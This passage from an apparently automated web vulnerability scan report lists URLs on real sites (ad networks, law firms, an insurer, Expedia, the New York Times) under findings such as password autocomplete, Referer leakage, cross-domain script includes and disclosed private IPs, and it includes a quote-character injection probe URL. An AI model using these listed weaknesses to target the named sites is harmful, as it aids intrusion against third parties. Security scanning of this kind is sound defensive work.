17.42. http://www.advisorsquare.com/new/BrochureLevel/transPx.gif
17.43. http://www.advisorsquare.com/new/BusinessLevel/FA09BannerBG.jpg
17.44. http://www.advisorsquare.com/new/BusinessLevel/grayStripe.gif
17.45. http://www.advisorsquare.com/new/BusinessLevel/transPx.gif
17.46. http://www.advisorsquare.com/new/asframeless02/content.asp
17.47. http://www.advisorsquare.com/new/asle04/content.asp
17.48. http://www.advisorsquare.com/new/asle04/grayStripe.gif
17.49. http://www.advisorsquare.com/new/asle04/staff_pict1.jpg
17.50. http://www.advisorsquare.com/new/asle04/staff_pict2.jpg
17.51. http://www.advisorsquare.com/new/asle05/content.asp
17.52. http://www.advisorsquare.com/new/asle05/transPx.gif
17.53. http://www.advisorsquare.com/new/css/menu.css
17.54. http://www.advisorsquare.com/new/images/banner_slogan1.jpg
17.55. http://www.advisorsquare.com/new/images/content_bg_repeat.jpg
17.56. http://www.advisorsquare.com/new/js/jquery-1.4.4.min.js.txt
17.57. http://www.advisorsquare.com/new/js/menu.js.txt
17.58. http://www.advisorsquare.com/new/js/preload.js.txt
17.59. http://www.advisorsquare.com/research/content.asp
17.60. http://www.advisorsquare.com/useradmin/Authenticate.asp
17.61. http://www.advisorsquare.com/websites1/PR/images/dotclear.gif
17.62. http://www.advisorsquare.com/websites1/Web/img/dotclear.gif
17.63. http://www.brownrudnick.com/nr/alertsArchv.asp
17.64. http://www.brownrudnick.com/nr/alertsArchv.asp
17.65. http://www.brownrudnick.com/nr/articlesindv.asp
17.66. http://www.dominionenterprises.com/main/do/Advertiser_Agreement
17.67. http://www.dominionenterprises.com/main/do/Careers
17.68. http://www.eneighborhoods.com/
17.69. http://www.expedia.com/Hotels
17.70. http://www.ezflexplan.com/lbmc/
17.71. http://www.ezflexplan.com/navigation/menu.asp
17.72. http://www.gofileroom.com/SessionRelease.asp
17.73. http://www.gofileroom.com/lbmc/
17.74. http://www.hunton.com/news/uniGC.aspx
17.75. http://www.hunton.com/professionals/uniGC.aspx
17.76. http://www.hunton.com/services/uniGC.aspx
17.77. http://www.lbmc.com/about_us
17.78. http://www.nextadvisor.com/favicon.ico
17.79. http://www.socialfollow.com/
17.80. http://www.socialfollow.com/blog/
17.81. http://www.socialfollow.com/login.php
17.82. https://www.taxnotebook.com/Login/PopupMessage.aspx
17.83. https://www.taxnotebook.com/Login/TNLogin.aspx
17.84. https://www.taxnotebook.com/tnstart.asp
17.85. http://www.twinspiresclub.com/members/join
17.86. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
17.87. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp
17.88. http://ad.adlegend.com/jscript
17.89. http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5
17.90. http://ad.yieldmanager.com/iframe3
17.91. http://ad.yieldmanager.com/imp
17.92. http://ad.yieldmanager.com/pixel
17.93. http://adfarm.mediaplex.com/ad/js/15368-110724-22624-68
17.94. http://adopt.imiclk.com/emb/q
17.95. http://ads.adonion.com/serving/tracking_id.php
17.96. http://ads.allatsea.net/www/delivery/lg.php
17.97. http://ads.allatsea.net/www/delivery/spc.php
17.98. http://ads.revsci.net/adserver/ako
17.99. http://ads.revsci.net/adserver/ako
17.100. http://ads.undertone.com/ajs.php
17.101. http://ads.undertone.com/fc.php
17.102. http://ads.undertone.com/l
17.103. http://adsfac.us/ag.asp
17.104. http://ak1.abmr.net/is/media.expedia.com
17.105. http://altfarm.mediaplex.com/ad/js/16228-124632-16454-0
17.106. http://api.twitter.com/1/statuses/user_timeline.json
17.107. http://ar.voicefive.com/b/wc_beacon.pli
17.108. http://ar.voicefive.com/bmx3/broker.pli
17.109. http://as.casalemedia.com/j
17.110. http://b.scorecardresearch.com/b
17.111. http://b.scorecardresearch.com/r
17.112. http://b.voicefive.com/b
17.113. http://bh.contextweb.com/bh/set.aspx
17.114. http://bid.openx.net/json
17.115. http://bidder.mathtag.com/iframe/notify
17.116. http://c7.zedo.com/bar/v16-406/c5/jsc/gl.js
17.117. http://cf.addthis.com/red/p.json
17.118. http://dce.sapha.com/logging.php
17.119. http://dce.sapha.com/logging.php
17.121. http://help.tagged.com/
17.122. http://image.providesupport.com/js/advancedaccess/safe-monitor.js
17.123. http://image.providesupport.com/js/charlesw/safe-standard.js
17.124. http://int.teracent.net/tase/int
17.125. http://leadback.advertising.com/adcedge/lb
17.126. http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif
17.128. http://media.fastclick.net/w/tre
17.129. http://meter-svc.nytimes.com/meter.js
17.130. https://meter-svc.nytimes.com/meter.js
17.132. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491
17.133. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif
17.134. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif
17.135. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif
17.136. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif
17.137. http://pix04.revsci.net/I10985/b3/0/3/1003161/1437265.js
17.138. http://pix04.revsci.net/I10985/b3/0/3/1003161/696734288.js
17.139. http://sales.liveperson.net/hc/56727252/
17.140. http://segment-pixel.invitemedia.com/pixel
17.141. http://store.kentuckyderby.com/
17.142. http://store.kentuckyderby.com/cart.php
17.143. http://syndication.mmismm.com/mmtnt.php
17.144. http://tags.bluekai.com/site/2576
17.145. http://tags.bluekai.com/site/2751
17.146. http://tags.bluekai.com/site/2753
17.147. http://tags.bluekai.com/site/2948
17.148. http://tags.bluekai.com/site/38
17.149. http://tags.bluekai.com/site/450
17.150. http://va.px.invitemedia.com/pixel
17.151. http://www.dhmiservices.com/ClickContact/js.ashx
17.152. http://www.dhmiservices.com/ImageHandler.ashx
17.153. http://www.dhmiservices.com/favicon.ico
17.154. http://www.eneighborhoods.com/common/s_code.js
17.155. http://www.eneighborhoods.com/css/basic.css
17.156. http://www.eneighborhoods.com/favicon.ico
17.157. http://www.eneighborhoods.com/images/about_contact_us_menu_over.jpg
17.158. http://www.eneighborhoods.com/images/about_contact_us_menu_up.jpg
17.159. http://www.eneighborhoods.com/images/agent_services_menu_over.jpg
17.160. http://www.eneighborhoods.com/images/agent_services_menu_up.jpg
17.161. http://www.eneighborhoods.com/images/bullet.gif
17.162. http://www.eneighborhoods.com/images/cmls.gif
17.163. http://www.eneighborhoods.com/images/dominion.gif
17.164. http://www.eneighborhoods.com/images/en_logo.gif
17.165. http://www.eneighborhoods.com/images/en_logo_white.jpg
17.166. http://www.eneighborhoods.com/images/enterprise_solutions_menu_over.jpg
17.167. http://www.eneighborhoods.com/images/enterprise_solutions_menu_up.jpg
17.168. http://www.eneighborhoods.com/images/footer_menu_bg.jpg
17.169. http://www.eneighborhoods.com/images/free_resources_menu_over.jpg
17.170. http://www.eneighborhoods.com/images/free_resources_menu_up.jpg
17.171. http://www.eneighborhoods.com/images/getstarted_button.gif
17.172. http://www.eneighborhoods.com/images/header_bckgd.jpg
17.173. http://www.eneighborhoods.com/images/home_image.jpg
17.174. http://www.eneighborhoods.com/images/homes_logo.jpg
17.175. http://www.eneighborhoods.com/images/menu_bg_new.jpg
17.176. http://www.eneighborhoods.com/images/spacer.gif
17.177. http://www.eneighborhoods.com/images/support_training_menus_over.jpg
17.178. http://www.eneighborhoods.com/images/support_training_menus_up.jpg
17.179. http://www.eneighborhoods.com/images/webinar_link.jpg
17.180. http://www.eneighborhoods.com/login_form.asp
17.181. http://www.eneighborhoods.com/main.css
17.182. http://www.eneighborhoods.com/menu/homepage/menu.css
17.183. http://www.eneighborhoods.com/menu/menu.css
17.184. http://www.eneighborhoods.com/menu/mm_css_menu.js
17.185. http://www.eneighborhoods.com/menumachine/core/w3cdom.js
17.186. http://www.eneighborhoods.com/menumachine/eneighborhoodsfooter2/menuspecs.js
17.187. http://www.eneighborhoods.com/menumachine/eneighborhoodshomemenu2/menuspecs.js
17.188. http://www.eneighborhoods.com/menumachine/menumachine2.js
17.189. http://www.expedia.com/default.asp
17.190. http://www.expedia.com/pub/agent.dll
17.191. https://www.expedia.com/pub/agent.dll
17.192. http://www.gofileroom.com/includes/css/main.css
17.193. http://www.gofileroom.com/includes/js/GFRAJAX.js
17.194. http://www.gofileroom.com/includes/js/login.js
17.195. http://www.gofileroom.com/includes/js/loginfunctions.js
17.196. http://www.gofileroom.com/lbmc/css/DocAudit.css
17.197. http://www.gofileroom.com/lbmc/images/LBMC%20horizontal%20blue.jpg
17.198. http://www.gofileroom.com/lbmc/images/angle3a.gif
17.199. http://www.gofileroom.com/lbmc/images/angle3b.gif
17.200. http://www.gofileroom.com/lbmc/images/button2A.gif
17.201. http://www.gofileroom.com/lbmc/images/check.gif
17.202. http://www.gofileroom.com/lbmc/images/dottedlinevert2.gif
17.203. http://www.gofileroom.com/lbmc/images/s-key.gif
17.204. http://www.gofileroom.com/lbmc/images/softwareInstalled.gif
17.205. http://www.gofileroom.com/lbmc/images/spacer.gif
17.206. http://www.gofileroom.com/lbmc/images/version.gif
17.207. https://www.gofileroom.com/lbmc
17.208. http://www.hunton.com/
17.209. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif
17.210. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif
17.211. http://www.hunton.com/FCWSite/Include/autocomplete.css
17.212. http://www.hunton.com/FCWSite/Include/footer.css
17.213. http://www.hunton.com/FCWSite/Include/footer_web.css
17.214. http://www.hunton.com/FCWSite/Include/general_web.css
17.215. http://www.hunton.com/FCWSite/Include/header.css
17.216. http://www.hunton.com/FCWSite/Include/header_web.css
17.217. http://www.hunton.com/FCWSite/Include/menu.js
17.218. http://www.hunton.com/FCWSite/Include/packetbuilder.css
17.219. http://www.hunton.com/FCWSite/Include/pdf.css
17.220. http://www.hunton.com/FCWSite/Include/print.css
17.221. http://www.hunton.com/FCWSite/Include/spamproof.aspx
17.222. http://www.hunton.com/FCWSite/Include/spamproof.js
17.223. http://www.hunton.com/FCWSite/img/Hunton/arrow_green_onblackbg.gif
17.224. http://www.hunton.com/FCWSite/img/Hunton/bullet.gif
17.225. http://www.hunton.com/FCWSite/img/Hunton/home_tile.gif
17.226. http://www.hunton.com/FCWSite/img/Hunton/middle/arrow_indicator.png
17.227. http://www.hunton.com/FCWSite/img/Hunton/middle/body_wide.png
17.228. http://www.hunton.com/FCWSite/img/Hunton/middle/bottom_wide.png
17.229. http://www.hunton.com/FCWSite/img/Hunton/middle/top_wide.png
17.230. http://www.hunton.com/_xpressHighlights/highlights_image.aspx
17.231. http://www.hunton.com/aboutus/uniGC.aspx
17.232. http://www.hunton.com/ajaxBCard.aspx
17.233. http://www.hunton.com/alan_kailer/
17.234. http://www.hunton.com/contactus/
17.235. http://www.hunton.com/dallas-united-states-of-america/
17.236. http://www.hunton.com/disclaimer/uniGC.aspx
17.237. http://www.hunton.com/emailthispage/emdisclaimer.aspx
17.246. http://www.hunton.com/include_common/NetInsight/ntpagetag.gif
17.247. http://www.hunton.com/include_common/NetInsight/ntpagetag.js
17.248. http://www.hunton.com/include_common/jQuery/dimensions.js
17.249. http://www.hunton.com/include_common/jQuery/html5media.min.js
17.250. http://www.hunton.com/include_common/jQuery/html5mediaConfig.js
17.251. http://www.hunton.com/include_common/jQuery/html5mediaOverlay.js
17.252. http://www.hunton.com/include_common/jQuery/jqDnR.js
17.253. http://www.hunton.com/include_common/jQuery/jquery.ajaxQueue.1.3.js
17.254. http://www.hunton.com/include_common/jQuery/jquery.autocomplete.min.js
17.255. http://www.hunton.com/include_common/jQuery/jquery.bgiframe.min.js
17.256. http://www.hunton.com/include_common/jQuery/jquery.min.js
17.257. http://www.hunton.com/include_common/jQuery/jquery.tools.1.2.5.min.js
17.258. http://www.hunton.com/include_common/jQuery/packetbuilder.js
17.259. http://www.hunton.com/include_common/jQuery/packetviewer.js
17.260. http://www.hunton.com/include_common/jQuery/ui.core.min.js
17.261. http://www.hunton.com/include_common/jQuery/ui.draggable.min.js
17.262. http://www.hunton.com/include_common/jQuery/ui.droppable.min.js
17.263. http://www.hunton.com/load.vcf
17.264. http://www.hunton.com/private_wealth_advisors/
17.265. http://www.hunton.com/sitemap/uniGC.aspx
17.266. http://www.millerwelds.com/financing/index.php
17.267. http://www.twinspiresclub.com/common/print.css
17.268. http://www.twinspiresclub.com/common/sifr.js
17.269. http://www.twinspiresclub.com/common/twinspiresclub.css
17.270. http://www.twinspiresclub.com/common/twinspiresclub.js
17.271. http://www.twinspiresclub.com/images/home/signup.gif
17.272. http://www.twinspiresclub.com/images/home/who_join.gif
17.273. http://www.twinspiresclub.com/images/home/why_join.gif
17.274. http://www.twinspiresclub.com/images/login_signin.gif
17.275. http://www.twinspiresclub.com/images/main_bg.gif
17.276. http://www.twinspiresclub.com/images/main_footer_bg.gif
17.277. http://www.twinspiresclub.com/images/nav/about.gif
17.278. http://www.twinspiresclub.com/images/nav/contact.gif
17.279. http://www.twinspiresclub.com/images/nav/join.gif
17.280. http://www.twinspiresclub.com/images/nav/news.gif
17.281. http://www.twinspiresclub.com/images/nav/twin_spires_club.gif
17.282. http://www.twinspiresclub.com/images/nav/vip.gif
17.283. http://www.twinspiresclub.com/images/player_reward_program.gif
17.284. http://www.twinspiresclub.com/images/side_arrow.gif
17.285. http://www.twinspiresclub.com/images/signup_message.gif
17.286. http://www.twinspiresclub.com/images/tools/bigger.gif
17.287. http://www.twinspiresclub.com/images/tools/biggest.gif
17.288. http://www.twinspiresclub.com/images/tools/bookmark.gif
17.289. http://www.twinspiresclub.com/images/tools/email.gif
17.290. http://www.twinspiresclub.com/images/tools/normal.gif
17.291. http://www.twinspiresclub.com/images/tools/print.gif
18. Password field with autocomplete enabled
18.1. http://hmficweb.hinghammutual.com/
18.2. http://hmficweb.hinghammutual.com/default.aspx
18.3. http://hmficweb.hinghammutual.com/reglogin.aspx
18.4. http://hmficweb.hinghammutual.com/reglogin.aspx
18.5. http://hmficweb.hinghammutual.com/reglogin.aspx
18.6. http://login.vindicosuite.com/
18.7. http://login.vindicosuite.com/default.asp
18.8. https://mosaicsecurity.com/products/1919-pci-scan-annual
18.9. https://myaccount.nytimes.com/auth/login
18.10. https://secure.trust-guard.com/
18.11. https://secure.trust-guard.com/index.php
18.12. http://www.advisorsquare.com/useradmin/Authenticate.asp
18.13. http://www.alumniconnections.com/alumni_members/mylisting/index.html
18.14. http://www.eneighborhoods.com/login_form.asp
18.15. https://www.expedia.com/pub/agent.dll
18.16. https://www.expedia.com/pub/agent.dll
18.17. http://www.gofileroom.com/lbmc/
18.18. https://www.gofileroom.com/lbmc/Default.asp
18.19. http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders
18.20. http://www.horseracingnation.com/probables/probables.aspx
18.21. http://www.lbmc.com/user
18.22. http://www.nbcconnecticut.com/
18.23. http://www.nbcconnecticut.com/
18.30. http://www.resiteonline.com/
18.31. http://www.socialfollow.com/
18.32. http://www.socialfollow.com/
18.33. http://www.socialfollow.com/blog/
18.34. http://www.socialfollow.com/login.php
18.35. http://www.socialfollow.com/login.php
18.36. https://www.taxnotebook.com/Login/ChangePwd.aspx
18.37. http://www.twinspiresclub.com/members/join
19.1. http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
19.2. http://js.nyt.com/js/app/timespeople/activities/1.6/activities.build.js
19.3. http://js.nyt.com/js/app/timespeople/toolbar/1.7/toolbar.build.min.js
19.4. http://js.nyt.com/js2/build/homepage/top.js
19.5. http://js.nyt.com/js2/build/sitewide/sitewide.js
19.6. https://myaccount.nytimes.com/gst/forgot
19.7. https://myaccount.nytimes.com/js/adx/googleads.js
19.8. https://myaccount.nytimes.com/js/app/lib/NYTD/0.0.1/template.js
19.9. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png
20.1. http://4qinvite.4q.iperceptions.com/Default.aspx
20.2. http://www.dhmiservices.com/Default.aspx
21. Referer-dependent response
21.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
21.2. http://480-adver-view.c3metrics.com/v.js
21.3. http://ad.yieldmanager.com/imp
21.4. http://depot.activalive.com/app/deployment.php
21.5. http://www.expedia.com/daily/service/default.asp
22.1. http://hmficweb.hinghammutual.com/
22.2. http://hmficweb.hinghammutual.com/default.aspx
22.3. http://www.resiteonline.com/
22.4. http://www.resiteonline.com/
23. Cross-domain Referer leakage
23.1. http://ab158636.servedbyadbutler.com/adserve/
23.2. http://ab158636.servedbyadbutler.com/adserve/
23.3. http://ab158636.servedbyadbutler.com/adserve/
23.4. http://ab158636.servedbyadbutler.com/adserve/
23.5. http://ab158636.servedbyadbutler.com/adserve/
23.6. http://ab158636.servedbyadbutler.com/adserve/
23.7. http://ab158636.servedbyadbutler.com/adserve/
23.8. http://ab158636.servedbyadbutler.com/adserve/
23.9. http://ab158636.servedbyadbutler.com/adserve/
23.10. http://ad.doubleclick.net/adi/N4538.132530.MICROSOFTONLINEINC1/B2304017.8
23.11. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2
23.12. http://ad.doubleclick.net/adj/scmag.hmktus/sc
23.13. http://ad.doubleclick.net/adj/scmag.hmktus/sc
23.14. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other
23.15. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other
23.16. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other
23.17. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other
23.18. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other
23.19. http://ad.yieldmanager.com/iframe3
23.20. http://ad.yieldmanager.com/iframe3
23.21. http://adopt.imiclk.com/emb/q
23.22. http://ads.adonion.com/serving/showbanner.php
23.23. http://ads.betfair.com/ad.aspx
23.24. http://ads.betfair.com/ad.aspx
23.25. http://ads.betfair.com/ad.aspx
23.26. http://ads.betfair.com/ad.aspx
23.27. http://ads.betfair.com/ad.aspx
23.28. http://ads.betfair.com/ad.aspx
23.29. http://allatsea.net/directclassifieds.php
23.30. http://apps.sapha.com/appshandler.php
23.31. http://as.casalemedia.com/j
23.32. http://b.rad.msn.com/ADSAdClient31.dll
23.33. http://bidder.mathtag.com/iframe/notify
23.34. http://creativeby1.unicast.com/assets/A372/N26104/M13191/P17/Q71239/script_300_250.js
23.37. http://fls.doubleclick.net/activityi
23.38. http://fls.doubleclick.net/activityi
23.39. http://fls.doubleclick.net/activityi
23.40. http://fls.doubleclick.net/activityi
23.41. http://googleads.g.doubleclick.net/pagead/ads
23.42. http://googleads.g.doubleclick.net/pagead/ads
23.43. http://googleads.g.doubleclick.net/pagead/ads
23.44. http://googleads.g.doubleclick.net/pagead/ads
23.45. http://googleads.g.doubleclick.net/pagead/ads
23.46. http://googleads.g.doubleclick.net/pagead/ads
23.47. http://googleads.g.doubleclick.net/pagead/ads
23.48. http://googleads.g.doubleclick.net/pagead/ads
23.49. http://googleads.g.doubleclick.net/pagead/ads
23.50. http://googleads.g.doubleclick.net/pagead/ads
23.51. http://googleads.g.doubleclick.net/pagead/ads
23.52. http://googleads.g.doubleclick.net/pagead/ads
23.53. http://googleads.g.doubleclick.net/pagead/ads
23.54. http://googleads.g.doubleclick.net/pagead/ads
23.55. http://googleads.g.doubleclick.net/pagead/ads
23.56. http://googleads.g.doubleclick.net/pagead/ads
23.57. http://googleads.g.doubleclick.net/pagead/ads
23.58. http://googleads.g.doubleclick.net/pagead/ads
23.59. http://googleads.g.doubleclick.net/pagead/ads
23.60. http://googleads.g.doubleclick.net/pagead/ads
23.61. http://googleads.g.doubleclick.net/pagead/ads
23.62. http://googleads.g.doubleclick.net/pagead/ads
23.63. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js
23.64. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js
23.65. http://img.mediaplex.com/content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js
23.66. http://img.mediaplex.com/content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js
23.67. http://img.mediaplex.com/content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js
23.68. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js
23.69. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js
23.70. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/gadgets/ifr
23.71. http://iv.doubleclick.net/adi/nbcu.lim.har/news-local-article
23.72. http://iv.doubleclick.net/adi/nbcu.lim.har/pid_ap_news-politics-article
23.73. http://iv.doubleclick.net/adj/nbcu.lim.har/hp-index
23.74. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/gadgets/ifr
23.75. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr
23.76. http://store.kentuckyderby.com/login.php
23.77. https://subscribe.haymarketmedia.com/scm/
23.78. http://tags.bluekai.com/site/2576
23.79. http://tags.bluekai.com/site/2576
23.80. http://tours.sapha.com/
23.81. https://verify.authorize.net/anetseal/
23.82. http://www.advisorsquare.com/new/asframeless02/content.asp
23.83. http://www.brownrudnick.com/nr/alertsArchv.asp
23.84. http://www.brownrudnick.com/nr/articlesindv.asp
23.85. http://www.caribbean-ocean.com/accommodation2.php
23.86. http://www.expedia.com/daily/hotels/unpublishedrates/default.asp
23.87. http://www.expedia.com/pub/agent.dll
23.88. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js
23.89. https://www.expedia.com/pub/agent.dll
23.90. http://www.hunton.com/aboutus/uniGC.aspx
23.91. http://www.hunton.com/disclaimer/uniGC.aspx
23.92. http://www.hunton.com/news/uniGC.aspx
23.93. http://www.hunton.com/professionals/uniGC.aspx
23.94. http://www.hunton.com/services/uniGC.aspx
23.95. http://www.hunton.com/sitemap/uniGC.aspx
23.96. http://www.lbmc.com/sites/all/modules/extlink/extlink.js
23.97. http://www.nbcconnecticut.com/includes/nbc_share.js
23.98. http://www.nutter.com/attorneys.php
23.99. http://www.nutter.com/careers.php
23.100. http://www.socialfollow.com/button/image/
23.101. http://www.tagged.com/help.html
23.102. http://www.tagged.com/index.html
24. Cross-domain script include
24.1. http://about-tagged.com/
24.2. http://adopt.imiclk.com/emb/q
24.3. http://ads.betfair.com/ad.aspx
24.4. http://ads.betfair.com/ad.aspx
24.5. http://ads.betfair.com/ad.aspx
24.6. http://ads.betfair.com/ad.aspx
24.7. http://ads.betfair.com/ad.aspx
24.8. http://ads.betfair.com/ad.aspx
24.10. http://allatsea.net/by-category/Cruising
24.11. http://allatsea.net/by-category/Deep_Sea_Fishing
24.12. http://allatsea.net/by-category/Sailing_Regatta
24.13. http://allatsea.net/classifieds.php
24.14. http://allatsea.net/directclassifieds.php
24.15. http://allatsea.net/subscribe.htm
24.16. http://creative.adonion.com/2_4092.html
24.17. http://fls.doubleclick.net/activityi
24.18. http://googleads.g.doubleclick.net/pagead/ads
24.19. http://googleads.g.doubleclick.net/pagead/ads
24.20. http://googleads.g.doubleclick.net/pagead/ads
24.21. http://iv.doubleclick.net/adi/nbcu.lim.har/news-local-article
24.22. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS
24.24. http://store.kentuckyderby.com/kentucky-derby-merchandise.php
24.25. https://subscribe.haymarketmedia.com/scm/
24.26. http://www.caribbean-ocean.com/
24.27. http://www.caribbean-ocean.com/accommodation2.php
24.28. http://www.caribbean-ocean.com/index.php
24.29. http://www.caribbean-ocean.com/index.php/1'
24.30. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91
24.31. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
24.32. http://www.eneighborhoods.com/
24.33. http://www.expedia.com/default.asp
24.34. http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders
24.35. http://www.horseracingnation.com/probables/probables.aspx
24.37. http://www.hunton.com/aboutus/uniGC.aspx
24.38. http://www.hunton.com/alan_kailer/
24.39. http://www.hunton.com/contactus/
24.40. http://www.hunton.com/dallas-united-states-of-america/
24.41. http://www.hunton.com/disclaimer/uniGC.aspx
24.42. http://www.hunton.com/news/uniGC.aspx
24.43. http://www.hunton.com/private_wealth_advisors/
24.44. http://www.hunton.com/professionals/uniGC.aspx
24.45. http://www.hunton.com/services/uniGC.aspx
24.46. http://www.hunton.com/sitemap/uniGC.aspx
24.47. http://www.millerwelds.com/financing/images/powerline_bg.png
24.48. http://www.millerwelds.com/financing/index.php
24.49. http://www.nbcconnecticut.com/
24.52. http://www.nextadvisor.com/favicon.ico
24.53. http://www.socialfollow.com/blog/
24.55. http://www.tagged.com/browse.html
24.56. http://www.tagged.com/find_groups.html
24.57. http://www.tagged.com/help.html
24.58. http://www.tagged.com/index.html
24.59. http://www.tagged.com/safety.html
24.60. http://www.tagged.com/terms_of_service.html
24.61. http://www.twinspiresclub.com/members/join
25.1. http://797-pwy-691.mktoresp.com/
25.2. http://about-tagged.com/
25.4. http://ads.allatsea.net/
25.5. http://ads.clicksor.com/
25.8. http://bh.contextweb.com/
25.11. http://depot.activalive.com/
25.12. http://haymarketbusinesspublications.122.2o7.net/
25.13. http://help.tagged.com/
25.14. http://lbmc.imonitor.net/
25.15. http://learn.bridgefront.com/
25.16. http://microsoftsto.112.2o7.net/
25.17. http://secure-us.imrworldwide.com/
25.18. http://store.kentuckyderby.com/
25.19. http://tags.bluekai.com/
25.20. http://tours.sapha.com/
25.21. http://widgets.digg.com/
25.22. http://www.brownrudnick.com/
25.23. http://www.caribbean-ocean.com/
25.24. http://www.nextadvisor.com/
26.1. http://ads1.msn.com/library/dap.js
26.2. http://allatsea.net/directclassifieds.php
26.3. http://allatsea.net/subscribe.htm
26.4. https://broker.gotoassist.com/favicon.ico
26.5. http://capec.mitre.org/data/definitions/118.html
26.6. http://freeconferencing.liveoffice.com/conferenceonline/scripts/putclicktocall.js
26.7. http://hmficweb.hinghammutual.com/
26.8. http://hmficweb.hinghammutual.com/abouthingham/
26.9. http://hmficweb.hinghammutual.com/abouthingham/Default.aspx
26.10. http://hmficweb.hinghammutual.com/abouthingham/directorsandofficers/
26.11. http://hmficweb.hinghammutual.com/abouthingham/history/
26.12. http://hmficweb.hinghammutual.com/agencylocator/
26.13. http://hmficweb.hinghammutual.com/agents/
26.14. http://hmficweb.hinghammutual.com/billing/
26.15. http://hmficweb.hinghammutual.com/claims/
26.16. http://hmficweb.hinghammutual.com/contactus/
26.17. http://hmficweb.hinghammutual.com/contactus/Default.aspx
26.18. http://hmficweb.hinghammutual.com/default.aspx
26.19. http://hmficweb.hinghammutual.com/privacy/
26.20. http://hmficweb.hinghammutual.com/privacy/Default.aspx
26.21. http://hmficweb.hinghammutual.com/products/
26.22. http://hmficweb.hinghammutual.com/products/cascoauto/
26.23. http://hmficweb.hinghammutual.com/products/commercialinsurance/
26.24. http://hmficweb.hinghammutual.com/products/commercialinsurance/Default.aspx
26.25. http://hmficweb.hinghammutual.com/products/commercialinsurance/bop/
26.26. http://hmficweb.hinghammutual.com/products/commercialinsurance/inlandmarine/
26.27. http://hmficweb.hinghammutual.com/products/personal/
26.28. http://hmficweb.hinghammutual.com/reglogin.aspx
26.29. https://myaccount.nytimes.com/gst/forgot
26.30. https://secure.trust-guard.com/ResetPassword.php
26.31. https://secure.trust-guard.com/index.php
26.32. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx
26.33. http://tours.sapha.com/
26.34. http://www.advisorsquare.com/design_gallery/fsplash/ProtectRClick.js
26.35. http://www.advisorsquare.com/new/asframeless02/content.asp
26.36. http://www.advisorsquare.com/new/asle05/content.asp
26.37. http://www.brownrudnick.com/nr/
26.38. http://www.caribbean-ocean.com/
26.39. http://www.caribbean-ocean.com/accommodation2.php
26.40. http://www.caribbean-ocean.com/index.php
26.41. http://www.caribbean-ocean.com/index.php/1'
26.42. http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js
26.43. http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js
26.44. http://www.dominionenterprises.com/site/scripts/s_code.js
26.45. http://www.eneighborhoods.com/common/s_code.js
26.46. http://www.expedia.com/pubspec/scripts/include/overrideHelper.js
26.47. https://www.expedia.com/pubspec/scripts/include/overrideHelper.js
26.48. http://www.hunton.com/include_common/jQuery/dimensions.js
26.49. http://www.hunton.com/include_common/jQuery/jqDnR.js
26.50. http://www.hunton.com/load.vcf
26.51. http://www.lbmc.com/landing/pci.htm
26.52. http://www.lbmc.com/sites/all/modules/extlink/extlink.js
26.53. http://www.nbcconnecticut.com/
26.54. http://www.nbcconnecticut.com/includes/jqModal.js
26.55. http://www.nbcconnecticut.com/includes/nbc_v3_user.js
26.58. http://www.nutter.com/attorneys.php
26.59. http://www.resiteonline.com/resite-login.js
26.60. http://www.socialfollow.com/blog/
26.61. http://www.tagged.com/safety.html
26.62. http://www.tagged.com/terms_of_service.html
26.63. http://www.twinspiresclub.com/common/twinspiresclub.js
27. Private IP addresses disclosed
27.1. http://api.facebook.com/restserver.php
27.2. http://api.facebook.com/restserver.php
27.3. http://api.facebook.com/restserver.php
27.4. http://api.facebook.com/restserver.php
27.5. http://api.facebook.com/restserver.php
27.6. http://api.facebook.com/restserver.php
27.7. http://api.facebook.com/restserver.php
27.8. http://api.facebook.com/restserver.php
27.9. http://api.facebook.com/restserver.php
27.10. http://api.facebook.com/restserver.php
27.11. http://api.facebook.com/restserver.php
27.12. http://connect.facebook.net/en_US/all.js
27.13. http://connect.facebook.net/en_US/all.js
27.14. http://connect.facebook.net/en_US/all.js
27.15. http://dce.sapha.com/engine.php
27.16. http://graph.facebook.com/791551865/picture
27.17. http://media.expedia.com/ads/travelhook/travelhook.js
27.19. http://support.expedia.com/app/answers/list/
